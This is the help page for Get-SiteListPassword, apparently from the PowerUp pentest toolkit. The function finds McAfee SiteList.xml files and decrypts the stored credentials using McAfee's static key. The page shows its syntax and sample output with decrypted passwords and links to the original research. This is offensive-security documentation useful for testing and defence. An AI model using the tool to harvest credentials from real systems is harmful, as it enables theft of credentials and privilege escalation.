blob: 1ebbb5b234182e1902cbf55d326829d202902550 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
|
# Get-SiteListPassword
## SYNOPSIS
Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
Based on Jerome Nokin (@funoverip)'s Python solution (in links).
Author: Jerome Nokin (@funoverip)
PowerShell Port: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
## SYNTAX
```
Get-SiteListPassword [[-Path] <String[]>]
```
## DESCRIPTION
Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
C:\Documents and Settings\, or C:\Users\.
For any files found, the appropriate
credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword
function that takes advantage of McAfee's static key encryption.
Any decrypted credentials
are output in custom objects.
See links for more information.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Get-SiteListPassword
```
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName :
Path : Products/CommonUpdater
Name : McAfeeHttp
DecPassword : MyStrongPassword!
Enabled : 1
DomainName :
Server : update.nai.com:80
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName : McAfeeService
Path : Repository$
Name : Paris
DecPassword : MyStrongPassword!
Enabled : 1
DomainName : companydomain
Server : paris001
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName : McAfeeService
Path : Repository$
Name : Tokyo
DecPassword : MyStrongPassword!
Enabled : 1
DomainName : companydomain
Server : tokyo000
## PARAMETERS
### -Path
Optional path to a SiteList.xml file or folder.
```yaml
Type: String[]
Parameter Sets: (All)
Aliases:
Required: False
Position: 1
Default value: None
Accept pipeline input: True (ByValue)
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
### PowerUp.SiteListPassword
## NOTES
## RELATED LINKS
[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf)
|